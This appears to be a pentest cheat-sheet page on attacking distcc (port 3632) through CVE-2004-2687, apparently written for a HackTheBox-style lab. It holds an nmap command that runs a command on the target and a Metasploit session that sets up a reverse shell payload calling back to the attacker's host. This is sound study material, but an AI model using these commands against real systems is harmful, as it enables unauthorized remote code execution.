Ctrlk

3632 - DISTCC

Information

distcc is a distributed compilation tool that allows code to be compiled across multiple machines in a network with the goal of significantly reducing compilation time via workload distribution.

Exploitation

Based on CVE-2004-2687.

sudo nmap -p3632 10.10.10.3 --script=distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

# Launching metasploit console
msfconsole -q
# Selecting the module
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
# Checking configuration options
msf6 exploit(unix/misc/distcc_exec) > show options
# Configuring the required variables
msf6 exploit(unix/misc/distcc_exec) > set payload /cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/misc/distcc_exec) > set LHOST tun0
LHOST => 10.10.14.22
# Executing the exploit
msf6 exploit(unix/misc/distcc_exec) > run

For an example of exploiting distcc see Lame.

Previous2181 - ZooKeeper Next8021 - FreeSWITCH

Last updated 1 year ago

hashtagInformation

hashtagExploitation

Information

Exploitation